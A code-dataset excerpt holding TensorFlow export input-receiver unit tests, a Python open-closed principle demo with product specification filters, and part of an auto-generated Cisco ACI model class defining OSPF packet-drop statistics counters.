tf.constant([0]),
u"feature1":
tf.constant([1]),
"feature2":
tf.sparse.SparseTensor(
indices=[[0, 0]], values=[1], dense_shape=[1, 1]),
}
labels = tf.constant([0])
with self.assertRaisesRegexp(ValueError,
"receiver_tensors must be defined"):
export.SupervisedInputReceiver(
features=features, labels=labels, receiver_tensors=None)
with self.assertRaisesRegexp(ValueError,
"receiver_tensor keys must be strings"):
export.SupervisedInputReceiver(
features=features,
labels=labels,
receiver_tensors={1: tf.constant(["test"], name="example0")})
with self.assertRaisesRegexp(ValueError,
"receiver_tensor example1 must be a Tensor"):
export.SupervisedInputReceiver(
features=features, labels=labels, receiver_tensors={"example1": [1]})
def test_single_feature_single_receiver(self):
feature = tf.constant(5)
label = tf.constant(5)
receiver_tensor = tf.constant(["test"])
input_receiver = export.SupervisedInputReceiver(feature, label,
receiver_tensor)
# single receiver is automatically named
receiver_key, = input_receiver.receiver_tensors.keys()
self.assertEqual("input", receiver_key)
def test_multi_feature_single_receiver(self):
features = {"foo": tf.constant(5), "bar": tf.constant(6)}
labels = {"value": tf.constant(5)}
receiver_tensor = tf.constant(["test"])
_ = export.SupervisedInputReceiver(features, labels, receiver_tensor)
def test_multi_feature_multi_receiver(self):
features = {"foo": tf.constant(5), "bar": tf.constant(6)}
labels = {"value": tf.constant(5)}
receiver_tensors = {"baz": tf.constant(5), "qux": tf.constant(6)}
_ = export.SupervisedInputReceiver(features, labels, receiver_tensors)
def test_feature_labeled_tensor(self):
feature = LabeledTensorMock()
label = tf.constant(5)
receiver_tensor = tf.constant(["test"])
_ = export.SupervisedInputReceiver(feature, label, receiver_tensor)
class ExportTest(tf.test.TestCase):
# Calling serving_input_receiver_fn requires graph mode.
@test_util.deprecated_graph_mode_only
def test_build_parsing_serving_input_receiver_fn(self):
feature_spec = {
"int_feature": tf.io.VarLenFeature(tf.dtypes.int64),
"float_feature": tf.io.VarLenFeature(tf.dtypes.float32)
}
serving_input_receiver_fn = export.build_parsing_serving_input_receiver_fn(
feature_spec)
with tf.Graph().as_default():
serving_input_receiver = serving_input_receiver_fn()
self.assertEqual(
set(["int_feature", "float_feature"]),
set(serving_input_receiver.features.keys()))
self.assertEqual(
set(["examples"]),
set(serving_input_receiver.receiver_tensors.keys()))
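      # Round trip: serialize a tf.Example and feed it through the
      # receiver's "examples" placeholder to check that parsing recovers
      # the expected sparse features.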
example = example_pb2.Example()
text_format.Parse(
"features: { "
" feature: { "
" key: 'int_feature' "
" value: { "
" int64_list: { "
" value: [ 21, 2, 5 ] "
" } "
" } "
" } "
" feature: { "
" key: 'float_feature' "
" value: { "
" float_list: { "
" value: [ 525.25 ] "
" } "
" } "
" } "
"} ", example)
with self.cached_session() as sess:
sparse_result = sess.run(
serving_input_receiver.features,
feed_dict={
serving_input_receiver.receiver_tensors["examples"].name: [
example.SerializeToString()
]
})
self.assertAllEqual([[0, 0], [0, 1], [0, 2]],
sparse_result["int_feature"].indices)
self.assertAllEqual([21, 2, 5], sparse_result["int_feature"].values)
self.assertAllEqual([[0, 0]], sparse_result["float_feature"].indices)
self.assertAllEqual([525.25], sparse_result["float_feature"].values)
# Calling serving_input_receiver_fn requires graph mode.
@test_util.deprecated_graph_mode_only
def test_build_raw_serving_input_receiver_fn_name(self):
"""Test case for issue #12755."""
f = {
"feature":
tf.compat.v1.placeholder(
name="feature", shape=[32], dtype=tf.dtypes.float32)
}
serving_input_receiver_fn = export.build_raw_serving_input_receiver_fn(f)
v = serving_input_receiver_fn()
self.assertIsInstance(v, export.ServingInputReceiver)
# Calling serving_input_receiver_fn requires graph mode.
@test_util.deprecated_graph_mode_only
def test_build_raw_serving_input_receiver_fn_without_shape(self):
"""Test case for issue #21178."""
f = {
"feature_1": tf.compat.v1.placeholder(tf.dtypes.float32),
"feature_2": tf.compat.v1.placeholder(tf.dtypes.int32)
}
serving_input_receiver_fn = export.build_raw_serving_input_receiver_fn(f)
v = serving_input_receiver_fn()
self.assertIsInstance(v, export.ServingInputReceiver)
self.assertEqual(tensor_shape.unknown_shape(),
v.receiver_tensors["feature_1"].shape)
self.assertEqual(tensor_shape.unknown_shape(),
v.receiver_tensors["feature_2"].shape)
def test_build_raw_serving_input_receiver_fn(self):
features = {
"feature_1": tf.constant(["hello"]),
"feature_2": tf.constant([42])
}
serving_input_receiver_fn = export.build_raw_serving_input_receiver_fn(
features)
with tf.Graph().as_default():
serving_input_receiver = serving_input_receiver_fn()
self.assertEqual(
set(["feature_1", "feature_2"]),
set(serving_input_receiver.features.keys()))
self.assertEqual(
set(["feature_1", "feature_2"]),
set(serving_input_receiver.receiver_tensors.keys()))
self.assertEqual(
tf.dtypes.string,
serving_input_receiver.receiver_tensors["feature_1"].dtype)
self.assertEqual(
tf.dtypes.int32,
serving_input_receiver.receiver_tensors["feature_2"].dtype)
def test_build_raw_supervised_input_receiver_fn(self):
features = {
"feature_1": tf.constant(["hello"]),
"feature_2": tf.constant([42])
}
labels = {"foo": tf.constant([5]), "bar": tf.constant([6])}
input_receiver_fn = export.build_raw_supervised_input_receiver_fn(
features, labels)
with tf.Graph().as_default():
input_receiver = input_receiver_fn()
self.assertEqual(
set(["feature_1", "feature_2"]), set(input_receiver.features.keys()))
self.assertEqual(set(["foo", "bar"]), set(input_receiver.labels.keys()))
self.assertEqual(
set(["feature_1", "feature_2", "foo", "bar"]),
set(input_receiver.receiver_tensors.keys()))
self.assertEqual(tf.dtypes.string,
input_receiver.receiver_tensors["feature_1"].dtype)
self.assertEqual(tf.dtypes.int32,
input_receiver.receiver_tensors["feature_2"].dtype)
def test_build_raw_supervised_input_receiver_fn_raw_tensors(self):
features = {
"feature_1": tf.constant(["hello"]),
"feature_2": tf.constant([42])
}
labels = {"foo": tf.constant([5]), "bar": tf.constant([6])}
input_receiver_fn1 = export.build_raw_supervised_input_receiver_fn(
features["feature_1"], labels)
input_receiver_fn2 = export.build_raw_supervised_input_receiver_fn(
features["feature_1"], labels["foo"])
with tf.Graph().as_default():
input_receiver = input_receiver_fn1()
self.assertIsInstance(input_receiver.features, tf.Tensor)
self.assertEqual(set(["foo", "bar"]), set(input_receiver.labels.keys()))
self.assertEqual(
set(["input", "foo", "bar"]),
set(input_receiver.receiver_tensors.keys()))
input_receiver = input_receiver_fn2()
self.assertIsInstance(input_receiver.features, tf.Tensor)
self.assertIsInstance(input_receiver.labels, tf.Tensor)
self.assertEqual(
set(["input", "label"]), set(input_receiver.receiver_tensors.keys()))
def test_build_raw_supervised_input_receiver_fn_batch_size(self):
features = {
"feature_1": tf.constant(["hello"]),
"feature_2": tf.constant([42])
}
labels = {"foo": tf.constant([5]), "bar": tf.constant([6])}
input_receiver_fn = export.build_raw_supervised_input_receiver_fn(
features, labels, default_batch_size=10)
with tf.Graph().as_default():
input_receiver = input_receiver_fn()
self.assertEqual([10], input_receiver.receiver_tensors["feature_1"].shape)
self.assertEqual([10], input_receiver.features["feature_1"].shape)
def test_build_raw_supervised_input_receiver_fn_overlapping_keys(self):
features = {
"feature_1": tf.constant(["hello"]),
"feature_2": tf.constant([42])
}
labels = {"feature_1": tf.constant([5]), "bar": tf.constant([6])}
with self.assertRaises(ValueError):
export.build_raw_supervised_input_receiver_fn(features, labels)
def test_build_supervised_input_receiver_fn_from_input_fn(self):
def dummy_input_fn():
return ({
"x": tf.constant([[1], [1]]),
"y": tf.constant(["hello", "goodbye"])
}, tf.constant([[1], [1]]))
input_receiver_fn = export.build_supervised_input_receiver_fn_from_input_fn(
dummy_input_fn)
with tf.Graph().as_default():
input_receiver = input_receiver_fn()
self.assertEqual(set(["x", "y"]), set(input_receiver.features.keys()))
self.assertIsInstance(input_receiver.labels, tf.Tensor)
self.assertEqual(
set(["x", "y", "label"]), set(input_receiver.receiver_tensors.keys()))
def test_build_supervised_input_receiver_fn_from_input_fn_args(self):
def dummy_input_fn(feature_key="x"):
return ({
feature_key: tf.constant([[1], [1]]),
"y": tf.constant(["hello", "goodbye"])
}, {
"my_label": tf.constant([[1], [1]])
})
input_receiver_fn = export.build_supervised_input_receiver_fn_from_input_fn(
dummy_input_fn, feature_key="z")
with tf.Graph().as_default():
input_receiver = input_receiver_fn()
self.assertEqual(set(["z", "y"]), set(input_receiver.features.keys()))
self.assertEqual(set(["my_label"]), set(input_receiver.labels.keys()))
self.assertEqual(
set(["z", "y", "my_label"]),
set(input_receiver.receiver_tensors.keys()))
class TensorServingReceiverTest(tf.test.TestCase):
def test_tensor_serving_input_receiver_constructor(self):
features = tf.constant([0])
receiver_tensors = {
"example0": tf.constant(["test0"], name="example0"),
u"example1": tf.constant(["test1"], name="example1"),
}
r = export.TensorServingInputReceiver(features, receiver_tensors)
self.assertIsInstance(r.features, tf.Tensor)
self.assertIsInstance(r.receiver_tensors, dict)
def test_tensor_serving_input_receiver_sparse(self):
features = tf.sparse.SparseTensor(
indices=[[0, 0]], values=[1], dense_shape=[1, 1])
receiver_tensors = {
"example0": tf.constant(["test0"], name="example0"),
u"example1": tf.constant(["test1"], name="example1"),
}
r = export.TensorServingInputReceiver(features, receiver_tensors)
self.assertIsInstance(r.features, tf.sparse.SparseTensor)
self.assertIsInstance(r.receiver_tensors, dict)
def test_serving_input_receiver_features_invalid(self):
receiver_tensors = {
"example0": tf.constant(["test0"], name="example0"),
u"example1": tf.constant(["test1"], name="example1"),
}
with self.assertRaisesRegexp(ValueError, "features must be defined"):
export.TensorServingInputReceiver(
features=None, receiver_tensors=receiver_tensors)
with self.assertRaisesRegexp(ValueError, "feature must be a Tensor"):
export.TensorServingInputReceiver(
features={"1": tf.constant([1])}, receiver_tensors=receiver_tensors)
def test_serving_input_receiver_receiver_tensors_invalid(self):
features = tf.constant([0])
with self.assertRaisesRegexp(ValueError,
"receiver_tensors must be defined"):
export.TensorServingInputReceiver(
features=features, receiver_tensors=None)
with self.assertRaisesRegexp(ValueError,
"receiver_tensor keys must be strings"):
export.TensorServingInputReceiver(
features=features,
receiver_tensors={1: tf.constant(["test"], name="example0")})
with self.assertRaisesRegexp(ValueError,
"receiver_tensor example1 must be a Tensor"):
export.TensorServingInputReceiver(
features=features, receiver_tensors={"example1": [1]})
if __name__ == "__main__":
tf.test.main()
| [
"[email protected]"
] | |
6b249119fe1fb273f634b04060a01fd3b1d39ab2 | 74091dce735f281188d38d2f00d1a68e1d38ff7a | /des_pattern/solid/open_closed_products.py | 580caa39d9c24cf86d03055117d399a49d6ebe4b | [] | no_license | nbiadrytski-zz/python-training | 96741aa0ef37bda32d049fde5938191025fe2924 | 559a64aae2db51e11812cea5ff602f25953e8070 | refs/heads/master | 2023-05-07T04:08:23.898161 | 2019-12-10T12:12:59 | 2019-12-10T12:12:59 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,252 | py | from enum import Enum
from abc import ABCMeta, abstractmethod
# Open Closed:
# A class should be open for extension (usually by inheritance), but closed for modification
# which means it's not a good idea to change something that is already working properly;
# it's better to extend the functionality in a new class
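# The demo below follows this: new criteria are added as Spec subclasses and
# combined, while ProductFilter itself never has to change.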
class Color(Enum):
RED = 1
GREEN = 2
BLUE = 3
class Size(Enum):
SMALL = 1
MEDIUM = 2
LARGE = 3
class Product:
def __init__(self, name, color, size):
self.name = name
self.color = color
self.size = size
# Enterprise patterns: Specification (inheritance)
class Spec(metaclass=ABCMeta):
@abstractmethod
def is_satisfied(self, item):
"""Does an item satisfy the requirement?"""
pass
class Filter(metaclass=ABCMeta):
@abstractmethod
def filter(self, items, spec):
pass
class ColorSpec(Spec):
def __init__(self, color):
self.color = color
def is_satisfied(self, item):
return item.color == self.color
class SizeSpec(Spec):
def __init__(self, size):
self.size = size
def is_satisfied(self, item):
return item.size == self.size
class CombinedSpec(Spec):
def __init__(self, spec1, spec2):
self.spec2 = spec2
self.spec1 = spec1
def is_satisfied(self, item):
return self.spec1.is_satisfied(item) and self.spec2.is_satisfied(item)
class ProductFilter(Filter):
def filter(self, items, spec):
for item in items:
if spec.is_satisfied(item):
yield item
apple = Product('Apple', Color.GREEN, Size.SMALL)
tree = Product('Tree', Color.GREEN, Size.LARGE)
house = Product('House', Color.BLUE, Size.LARGE)
products = [apple, tree, house]
prod_filter = ProductFilter()
print('Green products:')
green = ColorSpec(Color.GREEN)
for p in prod_filter.filter(products, green):
print(f' - {p.name} is green')
print('Large products:')
large = SizeSpec(Size.LARGE)
for p in prod_filter.filter(products, large):
print(f' - {p.name} is large')
print('Large blue items:')
large_blue = CombinedSpec(large, ColorSpec(Color.BLUE))
for p in prod_filter.filter(products, large_blue):
print(f' - {p.name} is large and blue')
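# Illustrative extension, not part of the original demo: a brand-new criterion
# is added as another Spec subclass and combined with the existing ones, while
# ProductFilter and the other specs stay untouched. NameSpec is a hypothetical
# addition for demonstration only.
class NameSpec(Spec):
    def __init__(self, name):
        self.name = name

    def is_satisfied(self, item):
        # satisfied when the product's name matches exactly
        return item.name == self.name


print('Green apples:')
green_apple = CombinedSpec(ColorSpec(Color.GREEN), NameSpec('Apple'))
for p in prod_filter.filter(products, green_apple):
    print(f' - {p.name} is a green apple')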
| [
"[email protected]"
] | |
dec24de5405f4f71820fe6d93f57980dca5268d8 | 24fe1f54fee3a3df952ca26cce839cc18124357a | /servicegraph/lib/python2.7/site-packages/acimodel-4.0_3d-py2.7.egg/cobra/modelimpl/ospf/dropunkstats1mo.py | ea481b7998b5e759da9b8dfb111dae63a3883847 | [] | no_license | aperiyed/servicegraph-cloudcenter | 4b8dc9e776f6814cf07fe966fbd4a3481d0f45ff | 9eb7975f2f6835e1c0528563a771526896306392 | refs/heads/master | 2023-05-10T17:27:18.022381 | 2020-01-20T09:18:28 | 2020-01-20T09:18:28 | 235,065,676 | 0 | 0 | null | 2023-05-01T21:19:14 | 2020-01-20T09:36:37 | Python | UTF-8 | Python | false | false | 21,275 | py | # coding=UTF-8
# **********************************************************************
# Copyright (c) 2013-2019 Cisco Systems, Inc. All rights reserved
# written by zen warriors, do not modify!
# **********************************************************************
from cobra.mit.meta import ClassMeta
from cobra.mit.meta import StatsClassMeta
from cobra.mit.meta import CounterMeta
from cobra.mit.meta import PropMeta
from cobra.mit.meta import Category
from cobra.mit.meta import SourceRelationMeta
from cobra.mit.meta import NamedSourceRelationMeta
from cobra.mit.meta import TargetRelationMeta
from cobra.mit.meta import DeploymentPathMeta, DeploymentCategory
from cobra.model.category import MoCategory, PropCategory, CounterCategory
from cobra.mit.mo import Mo
# ##################################################
class DropUnkStats1mo(Mo):
"""
Mo doc not defined in techpub!!!
"""
meta = StatsClassMeta("cobra.model.ospf.DropUnkStats1mo", "Ospf Drop Unknown Packets")
counter = CounterMeta("unknownPktsRcvd", CounterCategory.COUNTER, "packets", "Unknown Packets Received")
counter._propRefs[PropCategory.IMPLICIT_LASTREADING] = "unknownPktsRcvdLast"
counter._propRefs[PropCategory.IMPLICIT_CUMULATIVE] = "unknownPktsRcvdCum"
counter._propRefs[PropCategory.IMPLICIT_PERIODIC] = "unknownPktsRcvdPer"
counter._propRefs[PropCategory.IMPLICIT_MIN] = "unknownPktsRcvdMin"
counter._propRefs[PropCategory.IMPLICIT_MAX] = "unknownPktsRcvdMax"
counter._propRefs[PropCategory.IMPLICIT_AVG] = "unknownPktsRcvdAvg"
counter._propRefs[PropCategory.IMPLICIT_SUSPECT] = "unknownPktsRcvdSpct"
counter._propRefs[PropCategory.IMPLICIT_BASELINE] = "unknownPktsRcvdBase"
counter._propRefs[PropCategory.IMPLICIT_THRESHOLDED] = "unknownPktsRcvdThr"
counter._propRefs[PropCategory.IMPLICIT_TREND_BASE] = "unknownPktsRcvdTrBase"
counter._propRefs[PropCategory.IMPLICIT_TREND] = "unknownPktsRcvdTr"
counter._propRefs[PropCategory.IMPLICIT_RATE] = "unknownPktsRcvdRate"
meta._counters.append(counter)
counter = CounterMeta("rcvdPktsDropped", CounterCategory.COUNTER, "packets", "Received Packets Dropped")
counter._propRefs[PropCategory.IMPLICIT_LASTREADING] = "rcvdPktsDroppedLast"
counter._propRefs[PropCategory.IMPLICIT_CUMULATIVE] = "rcvdPktsDroppedCum"
counter._propRefs[PropCategory.IMPLICIT_PERIODIC] = "rcvdPktsDroppedPer"
counter._propRefs[PropCategory.IMPLICIT_MIN] = "rcvdPktsDroppedMin"
counter._propRefs[PropCategory.IMPLICIT_MAX] = "rcvdPktsDroppedMax"
counter._propRefs[PropCategory.IMPLICIT_AVG] = "rcvdPktsDroppedAvg"
counter._propRefs[PropCategory.IMPLICIT_SUSPECT] = "rcvdPktsDroppedSpct"
counter._propRefs[PropCategory.IMPLICIT_BASELINE] = "rcvdPktsDroppedBase"
counter._propRefs[PropCategory.IMPLICIT_THRESHOLDED] = "rcvdPktsDroppedThr"
counter._propRefs[PropCategory.IMPLICIT_TREND_BASE] = "rcvdPktsDroppedTrBase"
counter._propRefs[PropCategory.IMPLICIT_TREND] = "rcvdPktsDroppedTr"
counter._propRefs[PropCategory.IMPLICIT_RATE] = "rcvdPktsDroppedRate"
meta._counters.append(counter)
meta.moClassName = "ospfDropUnkStats1mo"
meta.rnFormat = "CDospfDropUnkStats1mo"
meta.category = MoCategory.STATS_CURRENT
meta.label = "current Ospf Drop Unknown Packets stats in 1 month"
meta.writeAccessMask = 0x8008020040001
meta.readAccessMask = 0x8008020040001
meta.isDomainable = False
meta.isReadOnly = True
meta.isConfigurable = False
meta.isDeletable = False
meta.isContextRoot = True
meta.parentClasses.add("cobra.model.ospf.IfStats")
meta.superClasses.add("cobra.model.ospf.DropUnkStats")
meta.superClasses.add("cobra.model.stats.Item")
meta.superClasses.add("cobra.model.stats.Curr")
meta.rnPrefixes = [
('CDospfDropUnkStats1mo', False),
]
prop = PropMeta("str", "childAction", "childAction", 4, PropCategory.CHILD_ACTION)
prop.label = "None"
prop.isImplicit = True
prop.isAdmin = True
prop._addConstant("deleteAll", "deleteall", 16384)
prop._addConstant("deleteNonPresent", "deletenonpresent", 8192)
prop._addConstant("ignore", "ignore", 4096)
meta.props.add("childAction", prop)
prop = PropMeta("str", "cnt", "cnt", 16212, PropCategory.REGULAR)
prop.label = "Number of Collections During this Interval"
prop.isImplicit = True
prop.isAdmin = True
meta.props.add("cnt", prop)
prop = PropMeta("str", "dn", "dn", 1, PropCategory.DN)
prop.label = "None"
prop.isDn = True
prop.isImplicit = True
prop.isAdmin = True
prop.isCreateOnly = True
meta.props.add("dn", prop)
prop = PropMeta("str", "lastCollOffset", "lastCollOffset", 111, PropCategory.REGULAR)
prop.label = "Collection Length"
prop.isImplicit = True
prop.isAdmin = True
meta.props.add("lastCollOffset", prop)
prop = PropMeta("str", "modTs", "modTs", 7, PropCategory.REGULAR)
prop.label = "None"
prop.isImplicit = True
prop.isAdmin = True
prop.defaultValue = 0
prop.defaultValueStr = "never"
prop._addConstant("never", "never", 0)
meta.props.add("modTs", prop)
prop = PropMeta("str", "rcvdPktsDroppedAvg", "rcvdPktsDroppedAvg", 48386, PropCategory.IMPLICIT_AVG)
prop.label = "Received Packets Dropped average value"
prop.isOper = True
prop.isStats = True
meta.props.add("rcvdPktsDroppedAvg", prop)
prop = PropMeta("str", "rcvdPktsDroppedBase", "rcvdPktsDroppedBase", 48381, PropCategory.IMPLICIT_BASELINE)
prop.label = "Received Packets Dropped baseline"
prop.isOper = True
prop.isStats = True
meta.props.add("rcvdPktsDroppedBase", prop)
prop = PropMeta("str", "rcvdPktsDroppedCum", "rcvdPktsDroppedCum", 48382, PropCategory.IMPLICIT_CUMULATIVE)
prop.label = "Received Packets Dropped cumulative"
prop.isOper = True
prop.isStats = True
meta.props.add("rcvdPktsDroppedCum", prop)
prop = PropMeta("str", "rcvdPktsDroppedLast", "rcvdPktsDroppedLast", 48380, PropCategory.IMPLICIT_LASTREADING)
prop.label = "Received Packets Dropped current value"
prop.isOper = True
prop.isStats = True
meta.props.add("rcvdPktsDroppedLast", prop)
prop = PropMeta("str", "rcvdPktsDroppedMax", "rcvdPktsDroppedMax", 48385, PropCategory.IMPLICIT_MAX)
prop.label = "Received Packets Dropped maximum value"
prop.isOper = True
prop.isStats = True
meta.props.add("rcvdPktsDroppedMax", prop)
prop = PropMeta("str", "rcvdPktsDroppedMin", "rcvdPktsDroppedMin", 48384, PropCategory.IMPLICIT_MIN)
prop.label = "Received Packets Dropped minimum value"
prop.isOper = True
prop.isStats = True
meta.props.add("rcvdPktsDroppedMin", prop)
prop = PropMeta("str", "rcvdPktsDroppedPer", "rcvdPktsDroppedPer", 48383, PropCategory.IMPLICIT_PERIODIC)
prop.label = "Received Packets Dropped periodic"
prop.isOper = True
prop.isStats = True
meta.props.add("rcvdPktsDroppedPer", prop)
prop = PropMeta("str", "rcvdPktsDroppedRate", "rcvdPktsDroppedRate", 48391, PropCategory.IMPLICIT_RATE)
prop.label = "Received Packets Dropped rate"
prop.isOper = True
prop.isStats = True
meta.props.add("rcvdPktsDroppedRate", prop)
prop = PropMeta("str", "rcvdPktsDroppedSpct", "rcvdPktsDroppedSpct", 48387, PropCategory.IMPLICIT_SUSPECT)
prop.label = "Received Packets Dropped suspect count"
prop.isOper = True
prop.isStats = True
meta.props.add("rcvdPktsDroppedSpct", prop)
prop = PropMeta("str", "rcvdPktsDroppedThr", "rcvdPktsDroppedThr", 48388, PropCategory.IMPLICIT_THRESHOLDED)
prop.label = "Received Packets Dropped thresholded flags"
prop.isOper = True
prop.isStats = True
prop.defaultValue = 0
prop.defaultValueStr = "unspecified"
prop._addConstant("avgCrit", "avg-severity-critical", 2199023255552)
prop._addConstant("avgHigh", "avg-crossed-high-threshold", 68719476736)
prop._addConstant("avgLow", "avg-crossed-low-threshold", 137438953472)
prop._addConstant("avgMajor", "avg-severity-major", 1099511627776)
prop._addConstant("avgMinor", "avg-severity-minor", 549755813888)
prop._addConstant("avgRecovering", "avg-recovering", 34359738368)
prop._addConstant("avgWarn", "avg-severity-warning", 274877906944)
prop._addConstant("cumulativeCrit", "cumulative-severity-critical", 8192)
prop._addConstant("cumulativeHigh", "cumulative-crossed-high-threshold", 256)
prop._addConstant("cumulativeLow", "cumulative-crossed-low-threshold", 512)
prop._addConstant("cumulativeMajor", "cumulative-severity-major", 4096)
prop._addConstant("cumulativeMinor", "cumulative-severity-minor", 2048)
prop._addConstant("cumulativeRecovering", "cumulative-recovering", 128)
prop._addConstant("cumulativeWarn", "cumulative-severity-warning", 1024)
prop._addConstant("lastReadingCrit", "lastreading-severity-critical", 64)
prop._addConstant("lastReadingHigh", "lastreading-crossed-high-threshold", 2)
prop._addConstant("lastReadingLow", "lastreading-crossed-low-threshold", 4)
prop._addConstant("lastReadingMajor", "lastreading-severity-major", 32)
prop._addConstant("lastReadingMinor", "lastreading-severity-minor", 16)
prop._addConstant("lastReadingRecovering", "lastreading-recovering", 1)
prop._addConstant("lastReadingWarn", "lastreading-severity-warning", 8)
prop._addConstant("maxCrit", "max-severity-critical", 17179869184)
prop._addConstant("maxHigh", "max-crossed-high-threshold", 536870912)
prop._addConstant("maxLow", "max-crossed-low-threshold", 1073741824)
prop._addConstant("maxMajor", "max-severity-major", 8589934592)
prop._addConstant("maxMinor", "max-severity-minor", 4294967296)
prop._addConstant("maxRecovering", "max-recovering", 268435456)
prop._addConstant("maxWarn", "max-severity-warning", 2147483648)
prop._addConstant("minCrit", "min-severity-critical", 134217728)
prop._addConstant("minHigh", "min-crossed-high-threshold", 4194304)
prop._addConstant("minLow", "min-crossed-low-threshold", 8388608)
prop._addConstant("minMajor", "min-severity-major", 67108864)
prop._addConstant("minMinor", "min-severity-minor", 33554432)
prop._addConstant("minRecovering", "min-recovering", 2097152)
prop._addConstant("minWarn", "min-severity-warning", 16777216)
prop._addConstant("periodicCrit", "periodic-severity-critical", 1048576)
prop._addConstant("periodicHigh", "periodic-crossed-high-threshold", 32768)
prop._addConstant("periodicLow", "periodic-crossed-low-threshold", 65536)
prop._addConstant("periodicMajor", "periodic-severity-major", 524288)
prop._addConstant("periodicMinor", "periodic-severity-minor", 262144)
prop._addConstant("periodicRecovering", "periodic-recovering", 16384)
prop._addConstant("periodicWarn", "periodic-severity-warning", 131072)
prop._addConstant("rateCrit", "rate-severity-critical", 36028797018963968)
prop._addConstant("rateHigh", "rate-crossed-high-threshold", 1125899906842624)
prop._addConstant("rateLow", "rate-crossed-low-threshold", 2251799813685248)
prop._addConstant("rateMajor", "rate-severity-major", 18014398509481984)
prop._addConstant("rateMinor", "rate-severity-minor", 9007199254740992)
prop._addConstant("rateRecovering", "rate-recovering", 562949953421312)
prop._addConstant("rateWarn", "rate-severity-warning", 4503599627370496)
prop._addConstant("trendCrit", "trend-severity-critical", 281474976710656)
prop._addConstant("trendHigh", "trend-crossed-high-threshold", 8796093022208)
prop._addConstant("trendLow", "trend-crossed-low-threshold", 17592186044416)
prop._addConstant("trendMajor", "trend-severity-major", 140737488355328)
prop._addConstant("trendMinor", "trend-severity-minor", 70368744177664)
prop._addConstant("trendRecovering", "trend-recovering", 4398046511104)
prop._addConstant("trendWarn", "trend-severity-warning", 35184372088832)
prop._addConstant("unspecified", None, 0)
meta.props.add("rcvdPktsDroppedThr", prop)
prop = PropMeta("str", "rcvdPktsDroppedTr", "rcvdPktsDroppedTr", 48390, PropCategory.IMPLICIT_TREND)
prop.label = "Received Packets Dropped trend"
prop.isOper = True
prop.isStats = True
meta.props.add("rcvdPktsDroppedTr", prop)
prop = PropMeta("str", "rcvdPktsDroppedTrBase", "rcvdPktsDroppedTrBase", 48389, PropCategory.IMPLICIT_TREND_BASE)
prop.label = "Received Packets Dropped trend baseline"
prop.isOper = True
prop.isStats = True
meta.props.add("rcvdPktsDroppedTrBase", prop)
prop = PropMeta("str", "repIntvEnd", "repIntvEnd", 110, PropCategory.REGULAR)
prop.label = "Reporting End Time"
prop.isImplicit = True
prop.isAdmin = True
meta.props.add("repIntvEnd", prop)
prop = PropMeta("str", "repIntvStart", "repIntvStart", 109, PropCategory.REGULAR)
prop.label = "Reporting Start Time"
prop.isImplicit = True
prop.isAdmin = True
meta.props.add("repIntvStart", prop)
prop = PropMeta("str", "rn", "rn", 2, PropCategory.RN)
prop.label = "None"
prop.isRn = True
prop.isImplicit = True
prop.isAdmin = True
prop.isCreateOnly = True
meta.props.add("rn", prop)
prop = PropMeta("str", "status", "status", 3, PropCategory.STATUS)
prop.label = "None"
prop.isImplicit = True
prop.isAdmin = True
prop._addConstant("created", "created", 2)
prop._addConstant("deleted", "deleted", 8)
prop._addConstant("modified", "modified", 4)
meta.props.add("status", prop)
prop = PropMeta("str", "unknownPktsRcvdAvg", "unknownPktsRcvdAvg", 48407, PropCategory.IMPLICIT_AVG)
prop.label = "Unknown Packets Received average value"
prop.isOper = True
prop.isStats = True
meta.props.add("unknownPktsRcvdAvg", prop)
prop = PropMeta("str", "unknownPktsRcvdBase", "unknownPktsRcvdBase", 48402, PropCategory.IMPLICIT_BASELINE)
prop.label = "Unknown Packets Received baseline"
prop.isOper = True
prop.isStats = True
meta.props.add("unknownPktsRcvdBase", prop)
prop = PropMeta("str", "unknownPktsRcvdCum", "unknownPktsRcvdCum", 48403, PropCategory.IMPLICIT_CUMULATIVE)
prop.label = "Unknown Packets Received cumulative"
prop.isOper = True
prop.isStats = True
meta.props.add("unknownPktsRcvdCum", prop)
prop = PropMeta("str", "unknownPktsRcvdLast", "unknownPktsRcvdLast", 48401, PropCategory.IMPLICIT_LASTREADING)
prop.label = "Unknown Packets Received current value"
prop.isOper = True
prop.isStats = True
meta.props.add("unknownPktsRcvdLast", prop)
prop = PropMeta("str", "unknownPktsRcvdMax", "unknownPktsRcvdMax", 48406, PropCategory.IMPLICIT_MAX)
prop.label = "Unknown Packets Received maximum value"
prop.isOper = True
prop.isStats = True
meta.props.add("unknownPktsRcvdMax", prop)
prop = PropMeta("str", "unknownPktsRcvdMin", "unknownPktsRcvdMin", 48405, PropCategory.IMPLICIT_MIN)
prop.label = "Unknown Packets Received minimum value"
prop.isOper = True
prop.isStats = True
meta.props.add("unknownPktsRcvdMin", prop)
prop = PropMeta("str", "unknownPktsRcvdPer", "unknownPktsRcvdPer", 48404, PropCategory.IMPLICIT_PERIODIC)
prop.label = "Unknown Packets Received periodic"
prop.isOper = True
prop.isStats = True
meta.props.add("unknownPktsRcvdPer", prop)
prop = PropMeta("str", "unknownPktsRcvdRate", "unknownPktsRcvdRate", 48412, PropCategory.IMPLICIT_RATE)
prop.label = "Unknown Packets Received rate"
prop.isOper = True
prop.isStats = True
meta.props.add("unknownPktsRcvdRate", prop)
prop = PropMeta("str", "unknownPktsRcvdSpct", "unknownPktsRcvdSpct", 48408, PropCategory.IMPLICIT_SUSPECT)
prop.label = "Unknown Packets Received suspect count"
prop.isOper = True
prop.isStats = True
meta.props.add("unknownPktsRcvdSpct", prop)
prop = PropMeta("str", "unknownPktsRcvdThr", "unknownPktsRcvdThr", 48409, PropCategory.IMPLICIT_THRESHOLDED)
prop.label = "Unknown Packets Received thresholded flags"
prop.isOper = True
prop.isStats = True
prop.defaultValue = 0
prop.defaultValueStr = "unspecified"
prop._addConstant("avgCrit", "avg-severity-critical", 2199023255552)
prop._addConstant("avgHigh", "avg-crossed-high-threshold", 68719476736)
prop._addConstant("avgLow", "avg-crossed-low-threshold", 137438953472)
prop._addConstant("avgMajor", "avg-severity-major", 1099511627776)
prop._addConstant("avgMinor", "avg-severity-minor", 549755813888)
prop._addConstant("avgRecovering", "avg-recovering", 34359738368)
prop._addConstant("avgWarn", "avg-severity-warning", 274877906944)
prop._addConstant("cumulativeCrit", "cumulative-severity-critical", 8192)
prop._addConstant("cumulativeHigh", "cumulative-crossed-high-threshold", 256)
prop._addConstant("cumulativeLow", "cumulative-crossed-low-threshold", 512)
prop._addConstant("cumulativeMajor", "cumulative-severity-major", 4096)
prop._addConstant("cumulativeMinor", "cumulative-severity-minor", 2048)
